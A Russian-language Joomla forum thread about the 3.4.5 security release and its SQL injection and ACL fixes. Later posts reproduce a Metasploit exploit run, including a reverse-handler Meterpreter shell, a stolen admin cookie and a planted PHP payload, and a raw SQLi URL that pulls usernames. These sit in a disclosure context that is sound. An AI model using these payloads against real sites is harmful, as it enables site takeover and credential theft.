- Сообщений: 957
- Спасибо получено: 138
Это форк Vinaora Nivo Slider, пришлось переименовать, в силу требования JED. Даже старую версию качать можно было только с варезных сайтов, нашпигованную троянами. Зачем оно такое, согласитесь.
Joomla 3.4.5 release containing a security fix will publish Thursday 22nd October at approximately 14:00 UTC .
The Joomla security team (JSST) has been informed of a critical security issue in the Joomla core.
Since this is a very important security fix, please be prepared to update your Joomla installation's next Thursday.
Until the release is out, please understand that we cannot provide any further information.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
Доступна к загрузке Joomla! 3.4.5. Это релиз безопасности для Joomla 3.x, настоятельно рекомендуется обновить Joomla немедленно.
Релиз содержит изменения, направленные на исправление найденных уязвимостей. Всего их три, одна из которых - уязвимость высокого уровня опасности. Настоятельно рекомендуем обновиться до Joomla 3.4.5 немедленно. Полный список ошибок доступен, как обычно, в Github.
Описание важных изменений:
- SQL Injection (подвержены версии Joomla начиная с 3.2 до 3.4.4) - уязвимость высокого уровня опасности. Недостаточная фильтрации запроса данных приводит к уязвимости SQL Injection.
- Core - ACL Violations (подвержены версии Joomla начиная с 3.2 до 3.4.4) - уязвимость среднего уровня опасности. Позволяет получить доступ к данным com_content доступ к которым должен быть ограничен.
- Core - ACL Violations (подвержены версии Joomla начиная с 3.0 до 3.4.4) - уязвимость среднего уровня опасности. Позволяет получить доступ к данным com_contenthistory доступ к которым должен быть ограничен.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
Add Joomla Content History SQLi RCE exploit module
This module exploits Asaf Orpani@Trustwave's Joomla SQLi in versions 3.2 up to 3.4.4. After gaining Administrator access it will create an extra template file with our payload, which provides a shell.
Steps to reproduce:
Deploy github.com/joomla/joomla-cms/releases/do...ble-Full_Package.zip on a linux VM (tested on Ubuntu 15.04)
Install through the web browser, keep everything default
Login to the administrator portal at http:///administrator
Click on "New Article" -> Title: "Anything" -> Body: "Anything" -> Save (Needed for some actual data in the _ucm_history table)
Make sure that you are still logged in as a Administrator (Super User) when you run the exploit module (As the SQLi will retrieve the admin session)
Run the exploit!
msf > use exploit/unix/webapp/joomla_contenthistory_sqli_rce msf exploit(joomla_contenthistory_sqli_rce) > set RHOST 192.168.2.130 RHOST => 192.168.2.130 msf exploit(joomla_contenthistory_sqli_rce) > exploit [*] Started reverse handler on 192.168.2.50:4444 [*] 192.168.2.130:80 - Retrieved table prefix [ n13xt ] [*] 192.168.2.130:80 - Retrieved admin cookie [ lvhjcpr08827qa2g45l537ct67 ] [*] 192.168.2.130:80 - Retrieved unauthenticated cookie [ 8ec83d68fe7891e981f2e286f15b31d3 ] [*] 192.168.2.130:80 - Successfully authenticated as Administrator [*] 192.168.2.130:80 - Creating file [ b6iu7Dy.php ] [*] 192.168.2.130:80 - Following redirect to [ /administrator/index.php?option=com_templates&view=template&id=503&file=L2I2aXU3RHkucGhw ] [*] 192.168.2.130:80 - Token [ b062c55811a959dd9cd0f209311cecdb ] retrieved [*] 192.168.2.130:80 - Template path [ /templates/beez3/ ] retrieved [*] 192.168.2.130:80 - Insert payload into file [ b6iu7Dy.php ] [*] 192.168.2.130:80 - Payload data inserted into [ b6iu7Dy.php ] [*] 192.168.2.130:80 - Executing payload [*] Sending stage (33068 bytes) to 192.168.2.130 [*] Meterpreter session 1 opened (192.168.2.50:4444 -> 192.168.2.130:46526) at 2015-10-23 16:55:26 +0700 [+] Deleted b6iu7Dy.php meterpreter > getuid Server username: www-data (33)
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
http://my_site.ru/index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(select%201%20from%20(select%20count(*),concat((select%20username%20from%20%23__users%20limit%200,1),floor(rand(0)*2))%20from%20information_schema.tables%20group%20by%202)x)
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.